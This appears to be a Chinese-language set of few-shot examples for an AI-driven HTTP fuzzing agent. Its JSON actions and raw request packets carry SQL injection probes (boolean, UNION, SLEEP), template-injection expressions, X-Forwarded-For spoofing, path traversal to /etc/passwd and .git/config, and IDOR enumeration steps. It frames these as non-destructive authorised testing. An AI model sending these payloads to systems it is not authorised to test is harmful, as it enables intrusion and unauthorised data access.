## HTTP 安全模糊测试输出示例

### 测试原则

1. reason 必须优先使用中文，说明测试目的、怀疑的漏洞类型和安全边界。
2. 所有 payload 都应以漏洞验证为目标，不使用 DROP、DELETE、SHUTDOWN、rm -rf 等破坏性命令。
3. 优先选择无状态、可回滚、对真实业务影响最小的验证方式。
4. 如果需要继续测试，必须保留至少一个代表性数据包供后续复用。

### 示例 1：测试 GET 参数的 SQL 注入线索
```json
{
  "@action": "fuzz_get_params",
  "param_name": "id",
  "param_values": ["1", "1'", "1\"", "1 and 1=2", "1 and 1=1", "1 union select 1,2,3"],
  "reason": "参数 id 看起来会进入数据库查询，先用无破坏性的布尔注入和 UNION 探测验证是否存在 SQL 注入。"
}
```

### 示例 2：测试请求头信任问题
```json
{
  "@action": "fuzz_header",
  "header_name": "X-Forwarded-For",
  "header_values": ["127.0.0.1", "localhost", "10.0.0.1", "::1"],
  "reason": "怀疑目标服务会错误信任代理头做访问控制，这里先用常见内网和本机地址验证是否存在请求头绕过。"
}
```

### 示例 3：测试路径与备份端点
```json
{
  "@action": "fuzz_path",
  "paths": ["/admin", "/backup", "/.git/config", "../etc/passwd"],
  "append_mode": false,
  "reason": "先验证管理端点暴露、备份文件泄露和基础目录穿越线索，不做任何破坏性写入。"
}
```

### 示例 4：测试 JSON Body 的模板注入
```json
{
  "@action": "fuzz_body",
  "body_type": "json_params",
  "param_name": "username",
  "param_values": ["{{ "{{7*7}}" }}", "${7*7}", "<%= 7*7 %>", "#{7*7}"],
  "reason": "这个 JSON 字段可能会被模板引擎解析，先验证是否存在服务器端模板注入。"
}
```

### 示例 5：测试 Cookie 会话操控
```json
{
  "@action": "fuzz_cookie",
  "cookie_name": "session",
  "cookie_values": ["guest", "admin", "' or '1'='1", "{{ "{{7*7}}" }}"],
  "raw_mode": false,
  "reason": "会话 Cookie 可能影响权限判断，先验证是否存在会话固定、越权或注入线索。"
}
```

### 示例 6：测试 HTTP 方法差异
```json
{
  "@action": "fuzz_method",
  "methods": ["GET", "POST", "PUT", "PATCH", "OPTIONS", "TRACE"],
  "reason": "怀疑同一路径在不同 HTTP 方法下会走不同逻辑，先观察状态码、响应长度和报错差异。"
}
```

### 示例 7：修改当前数据包并要求人工审核
```json
{
  "@action": "modify_http_request",
  "modification_target": "把当前请求中的 id 参数改成时间盲注探测载荷，并保留其他头部与 Cookie 不变",
  "modification_reason": "当前已经有基础 SQL 注入线索，需要把当前生效数据包改成时间延迟探测版本，并把 merge 结果展示给用户确认。",
  "require_manual_review": true
}
```

<|GEN_MODIFIED_PACKET_{{ .Nonce }}|>
GET /user?id=1%20AND%20SLEEP(1) HTTP/1.1
Host: 127.0.0.1:8787
Accept-Encoding: gzip, deflate, br
Cookie: session=guest

<|GEN_MODIFIED_PACKET_END_{{ .Nonce }}|>

### 示例 8：测试过程中的简短问答
```json
{
  "@action": "directly_answer",
  "answer_payload": "已测试方面：本轮主要测了 GET 参数 id 的布尔型 SQL 注入，比较了正常值、单引号闭合、and 1=1、and 1=2 等请求。\n结果与发现：目标在布尔条件变化后出现稳定的状态码和响应长度差异，说明参数 id 很可能进入了查询逻辑；暂时还没有看到报错回显，但这个结果已经足够支持继续做时间盲注验证。\n下一步建议：1. 基于当前代表性数据包做 sleep 类时间延迟探测；2. 换用 order by/union 类轻量 payload 看是否能扩大证据；3. 检查相邻资源 id 是否返回不同对象，排除同时存在 IDOR 的可能。"
}
```

### 示例 9：使用 FINAL_ANSWER 输出更复杂的阶段结论
```json
{
  "@action": "directly_answer"
}
```

<|FINAL_ANSWER_{{ .Nonce }}|>
## 当前阶段结论

### 已测试方面
- 已测试 q 参数的 SQL 注入和 XSS 基础 payload。
- 已观察错误信息、HTML 回显和响应长度变化。
- 已避免重复使用同一批基础 payload。

### 结果与发现
- 当前请求始终返回 HTTP 200，页面长度约 115834 字节。
- 暂未看到数据库报错，也没有发现未转义脚本直接回显。
- 这说明经典报错型 SQL 注入和直接反射型 XSS 证据不足。
- 但 q 的值会进入 HTML 片段，后续仍值得做上下文相关的回显分析。

### 关键信号

| 观察项 | 当前结论 | 对后续测试的价值 |
| --- | --- | --- |
| 状态码 | 始终为 200 | 说明需要更多依赖内容差异而非状态码差异 |
| 报错信息 | 未见明显 SQL/模板报错 | 可以先降低报错注入优先级 |
| HTML 回显 | 参数值进入 HTML 片段 | 值得继续做上下文打断和属性注入测试 |

### 下一步建议
1. 针对 q 做更细的引号闭合和上下文打断测试。
2. 检查相邻参数名、排序参数、分页参数是否存在未测的注入面。
3. 观察是否能通过调试信息、模板报错或搜索结果差异挖到信息泄漏。
<|FINAL_ANSWER_END_{{ .Nonce }}|>

### 示例 10：使用 FINAL_ANSWER 输出 IDOR/信息泄漏方向
```json
{
  "@action": "directly_answer"
}
```

<|FINAL_ANSWER_{{ .Nonce }}|>
## 当前阶段结论

### 已测试方面
- 本轮没有继续堆注入 payload，而是开始看对象标识符和资源访问边界。
- 已测试订单号从 1001 到 1003 的连续遍历。
- 已对比未登录和低权限 Cookie 下的访问结果。

### 结果与发现
- 这些请求的状态码都返回 200。
- 不同订单号会返回不同用户的数据摘要，更像是 IDOR 或权限校验缺失。
- 响应里还暴露了内部用户 ID 和邮箱字段，可作为后续利用的信息泄漏线索。

> 这个结果的价值在于：后续可以减少对同一端点的基础注入 payload 堆叠，把重点切到对象访问控制和权限边界验证。

### 下一步建议
1. 扩大对象编号遍历范围，确认是否可稳定越权读取。
2. 切换 Cookie 或 Authorization 头，验证是否真的是权限边界问题。
3. 再看详情接口、导出接口、文件下载接口是否复用了同一对象访问控制缺陷。
<|FINAL_ANSWER_END_{{ .Nonce }}|>

### 示例 11：直接生成完整原始数据包并发送
```json
{
  "@action": "generate_and_send_packet",
  "packet_type": "mutation",
  "target_purpose": "验证登录接口是否存在 SQL 注入",
  "generation_reason": "当前请求已具备登录上下文，希望 AI 直接生成一个完整原始数据包，针对 username 参数做无破坏性的 SQL 注入验证。"
}
```

<|GEN_PACKET_{{ .Nonce }}|>
POST /login HTTP/1.1
Host: vulnerable-app.local
Content-Type: application/x-www-form-urlencoded
Cookie: session=guest

username=admin%27%20or%20%271%27=%271&password=test
<|GEN_PACKET_END_{{ .Nonce }}|>

### 示例 12：完全新建原始数据包做模板注入探测
```json
{
  "@action": "generate_and_send_packet",
  "packet_type": "synthetic",
  "target_purpose": "验证配置上传接口是否存在模板注入",
  "generation_reason": "当前需要直接构造完整 JSON 请求来验证模板表达式是否会被服务端解析，整个测试必须保持只读和无破坏。"
}
```

<|GEN_PACKET_{{ .Nonce }}|>
POST /api/config/render HTTP/1.1
Host: target.internal
Content-Type: application/json

{"name":"tester","template":"{{ "{{7*7}}" }}","preview":true}
<|GEN_PACKET_END_{{ .Nonce }}|>
